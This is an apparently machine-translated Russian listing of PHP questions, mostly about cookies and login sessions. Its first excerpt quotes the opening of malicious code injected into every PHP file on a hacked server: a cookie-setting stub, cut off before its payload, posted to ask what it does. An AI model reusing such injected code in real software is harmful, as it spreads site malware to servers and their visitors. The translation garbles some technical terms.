Articles of cookies

Got Hacked – Кто-нибудь знает, что делает этот PHP-код?

Наш сервер был взломан через некоторый метод SQL Injection (теперь исправлен). Все наши файлы PHP получили это добавление в самый верх каждого файла. global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); […]

Laravel 4 Запомнить меня истекает время

Я довольно новичок в Laravel и задал вопрос о том, как меня помнить. Я успешно включил функцию «запомнить меня», добавив второй аргумент в метод Auth :: try. if (Auth::attempt(array('email' => $email, 'password' => $password), true)) { // The user is being remembered… } Как отмечено в документации, это позволяет запомнить меня неопределенно или до тех […]

Что является относительно безопасным способом использования файла cookie для входа?

Мне было интересно, какой самый безопасный способ входа в cookie? Если вы просто храните проход (зашифрованный солью) и имя пользователя в cookie и проверяете его против таблицы пользователя, потенциальный злоумышленник может украсть файл cookie и войти в систему. Обычно люди не проверяют «в последний раз онлайн». Так есть лучший способ для «помнить меня, печенье»? IP […]

Сессия теряется после перенаправления OAuth

Я использую CakePHP 2.4. У меня есть подпись OAuth на моем сайте. % 99,5 знаков успешно, но% 0,5 терпит неудачу. У меня эта ошибка в течение нескольких месяцев. Я пробовал много вещей для отладки и регистрации, но все же я не решил проблему. Хотя большинство запросов хороши, мне нужно решить небольшую часть. Сценарий выглядит следующим […]

PHP-файлы cookie для нескольких доменов

Я хочу создать cookie из одного домена после регистрации пользователя на PHP. и сделать этот файл cookie доступным для 4 других доменов, а не для поддоменов. Я знаю, что файлы cookie не предназначены для доступа к другим доменам. Например, я установил переменную cookie $ user_email из домена www.firstdomain.com и хочу получить к ней доступ в […]

Проблемы с удалением файлов cookie не будут отменены

Я попытался найти руководство по php и интернету о том, как удалить файлы cookie, и я пробовал его точно так же, как они все говорят: setcookie("name", '', 1); или setcookie("name", '', time()-3600); Но когда я проверяю файлы cookie в диалоговом окне файлов cookie в Firefox, он все еще там с одинаковым значением. Я установил этот […]

Как работает проверка идентификатора OpenID?

Ну, я пытаюсь внедрить вход Steam OpenID на сайт, но я не совсем уверен, как это делается и как Steam проверяет пользователей, которые вошли в систему с OpenID. Что до сих пор, что я узнал, это то, что пар только возвращает идентификатор пользователя и ничего больше, поэтому для остальных вещей мне придется использовать API для […]

Получение лака для работы с Magento

Сначала, пожалуйста, простите меня за полное отсутствие понимания лака. Это мой первый шаг – сделать что-нибудь с лаком. Я следую примеру: http://www.kalenyuk.com.ua/magento-performance-optimization-with-varnish-cache-47.html Однако, когда я устанавливаю и запускаю это, Varnish, похоже, не кэширует. Я получаю заголовок X-Varnish с одним номером и заголовком Via, который имеет значение 1.1 лак Мне сказали (моим провайдером), что из-за следующего […]

Лучшая практика для запоминания меня имеет функцию

Я использую 2 переменные в cookie (7 дней), которые являются идентификатором пользователя и хешем. Хэш – это кодировка sha1 пользовательского агента и идентификатора пользователя. В этом случае какой-то хакер может войти в систему, который знает браузер украденного файла cookie. Каким образом я должен следовать или какая практика лучше всего помнить о проблемах безопасности?

как получить куки от php curl в переменную

Поэтому какой-то парень в какой-то другой компании подумал, что было бы здорово, если бы вместо использования мыла или xml-rpc или отдыха или любого другого разумного коммуникационного протокола он просто вложил весь свой ответ в виде файлов cookie в заголовке. Мне нужно вытащить эти файлы cookie, как мы надеемся, из этого кривого ответа. Если мне придется […]

Intereting Posts
Laravel 5.2 | запросите от многих до многих к одному Опубликовать JSON в android В php Вместо загрузки файла csv он открывается в браузере Являются ли массивы неявно созданы в PHP, когда одному из его ключей присваивается что-то? PHP – функция раскрывающегося списка, которая удерживает текущую страницу в фокусе preg_match получить несколько Laravel multi auth – поставщик пользовательской аутентификации не определен Magento – проблема с созданием настраиваемого модуля Приложение CodeIgniter показывает 404 при переходе на производство Разница между установкой ID напрямую и установкой красноречивого отношения ассоциирования при сохранении модели в Laravel? Как загрузить верхний и нижний колонтитулы .html dynamicaly PHP: печать неопределенных переменных без предупреждения Можно ли удалить реферер в PHP перед перенаправлением? Как добавить несколько маркеров в google map Code Logic для предотвращения столкновения между двумя оговорками